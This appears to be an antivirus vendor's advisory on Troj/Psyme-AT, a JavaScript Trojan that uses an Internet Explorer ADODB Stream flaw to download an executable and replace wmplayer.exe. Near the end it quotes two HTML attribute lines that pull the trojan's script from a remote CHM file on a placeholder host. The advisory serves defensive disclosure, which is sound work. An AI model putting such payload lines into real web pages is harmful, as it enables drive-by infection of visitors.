high
Summary
Summary
Action- More Information
| How it spreads |
|
|---|---|
| Affected operating systems | Windows |
| Included in our products from | November 2004 (3.87) |
| Protection available since | 13 September 2004 09:40:06 (GMT) |
| Detected by | All Sophos products |
Action
- Summary
- Action
- More Information
Please follow the instructions for removing Trojans.
More Information
Troj/Psyme-AT is a JavaScript Trojan which exploits the ADODB Stream vulnerability associated with Microsoft Internet Explorer to silently download an executable file from a remote server to the local computer.
The executable is saved as wmplayer.exe and wmplayer.exe.bak to the following locations (if they exist), replacing legitimate versions of wmplayer.exe:
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Programmer\Windows Media Player\wmplayer.exe
C:\Program\Windows Media Player\wmplayer.exe
C:\Programme\Windows Media Player\wmplayer.exe
C:\Programmi\Windows Media Player\wmplayer.exe
C:\Programfiler\Windows Media Player\wmplayer.exe
C:\Programas\Windows Media Player\wmplayer.exe
C:\Archivos de programa\Windows Media Player\wmplayer.exe
D:\Program Files\Windows Media Player\wmplayer.exe
D:\Programmer\Windows Media Player\wmplayer.exe
D:\Program\Windows Media Player\wmplayer.exe
D:\Programme\Windows Media Player\wmplayer.exe
D:\Programmi\Windows Media Player\wmplayer.exe
D:\Programfiler\Windows Media Player\wmplayer.exe
D:\Programas\Windows Media Player\wmplayer.exe
D:\Archivos de programa\Windows Media Player\wmplayer.exe
Troj/Psyme-AT can arrive on the computer by browsing websites whose HTML pages
contain the script or by loading a HTML page that contains a link to an infected page. For example a HTML page may contain:
data=html:file://C:\\unknown.mht!http://unknown.com/dial.chm::/x.htm
src=http://unknown.com/dial.chm::/x.htm
where dial.chm is a compiled HTML help file containing x.htm and x.htm is a HTML file containing the Troj/Psyme-AT script.
|
